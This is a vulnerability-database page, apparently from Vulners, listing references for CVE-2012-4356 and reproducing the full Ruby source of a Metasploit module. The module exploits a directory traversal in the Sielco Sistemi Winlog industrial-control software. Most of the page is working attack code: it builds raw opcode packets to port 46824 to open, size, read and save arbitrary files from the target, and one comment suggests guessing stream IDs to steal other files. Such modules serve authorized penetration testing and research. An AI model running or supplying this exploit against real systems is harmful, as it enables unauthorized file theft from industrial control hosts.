Lucene search
K

Sielco Sistemi Winlog Remote File Access

🗓️ 12 Jul 2012 11:12:31Reported by Luigi Auriemma, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 27 Views

Si Sistemi Winlog Remote File Access - Exploits directory traversal in Sielco Sistemi Winlog Runtime.exe service via crafted packet to 46824/TCP port. Successfully tested on Sielco Sistemi Winlog Lite 2.07.14

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-4356
27 Jun 201200:00
circl
CVE
CVE-2012-4356
19 Aug 201220:00
cve
Cvelist
CVE-2012-4356
19 Aug 201220:00
cvelist
ICS
Sielco Sistemi Winlog Multiple Vulnerabilities
4 May 201206:00
ics
NVD
CVE-2012-4356
19 Aug 201220:55
nvd
OpenVAS
Sielco Sistemi Winlog Multiple Vulnerabilities
28 Jun 201200:00
openvas
Packet Storm
Sielco Sistemi Winlog Remote File Access
31 Aug 202400:00
packetstorm
Prion
Directory traversal
19 Aug 201220:55
prion
RedhatCVE
CVE-2012-4356
22 May 202502:14
redhatcve
Tenable Nessus
Sielco Sistemi Winlog < 2.07.17 Multiple Vulnerabilities
10 Sep 201200:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sielco Sistemi Winlog Remote File Access',
      'Description'    => %q{
          This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
        exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
        to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
        2.07.14.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4356' ],
          [ 'OSVDB', '83275' ],
          [ 'BID', '54212' ],
          [ 'EDB', '19409'],
          [ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(46824),
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
        OptInt.new('DEPTH', [true, 'Traversal depth', 10])
      ])
  end

  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
      print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
      return
    end

    travs = "../" * datastore['DEPTH']
    if datastore['FILEPATH'][0] == "/"
      travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
    else
      travs << datastore['FILEPATH']
    end

    connect

    # Open File through _TCPIPS_BinOpenFileFP
    packet = "\x00" * 20
    packet << "\x78" # Opcode
    packet << travs # Path traversal
    packet << "\x00"
    sock.put(packet)
    response = sock.get_once(5, 1) || ''

    if response.unpack("C").first != 0x78
      print_error "#{ip}:#{rport} - Error opening file"
      return
    end
    # The stream allows to identify our file since the
    # server could be handling multiple files simultaneously.
    # Since the stream identifier is just an offset in an array
    # of opened streams it could be used to guess other files
    # opened by the server and stole them :-) just an idea....
    stream = response[1, 4]

    # Get File Length through _TCPIPS_BinGetFileSizeFP
    packet = "\x00" * 20
    packet << "\x79" # Opcode
    packet << stream # stream
    packet << "\x00" * 7
    sock.put(packet)
    response = sock.get_once(5, 1) || ''

    if response.unpack("C").first != 0x79
      print_error "#{ip}:#{rport} - Error getting the file length"
      return
    end
    file_length = response[1,4].unpack("V").first


    # Read File with the help of _TCPIPS_BinGetStringRecordFP
    contents = ""
    offset = 0
    while contents.length < file_length
      packet = "\x00" * 20
      packet << "\x98" # Opcode
      packet << [offset].pack("V") # offset (blocks of 0x55)
      packet << stream # stream
      packet << "\x00" * 3
      sock.put(packet)
      response = ""

      while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
        response << sock.get_once(0x7ac-response.length, 5) || ''
      end
      if response.unpack("C").first != 0x98
        print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
      end

      if (file_length - contents.length) < response.length - 9
        contents << response[9, file_length - contents.length] # last packet
      else
        contents << response[9, response.length] # no last packet
      end

      offset = offset + 0x17 # 17 blocks in every packet
    end

    # Close File through _TCPIPS_BinCloseFileFP
    packet = "\x00" * 20
    packet << "\x7B"
    packet << "\x00" * 11
    sock.put(packet)
    response = sock.get_once(-1, 1) || ''
    if response.unpack("C").first != 0x7B
      print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
    end

    disconnect

    print_good "#{ip}:#{rport} - File retrieved successfully!"

    fname = File.basename(datastore['FILEPATH'])
    path = store_loot(
      'sielcosistemi.winlog',
      'application/octet-stream',
      ip,
      contents,
      fname,
      datastore['FILEPATH']
    )
    print_status("#{ip}:#{rport} - File saved in: #{path}")

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation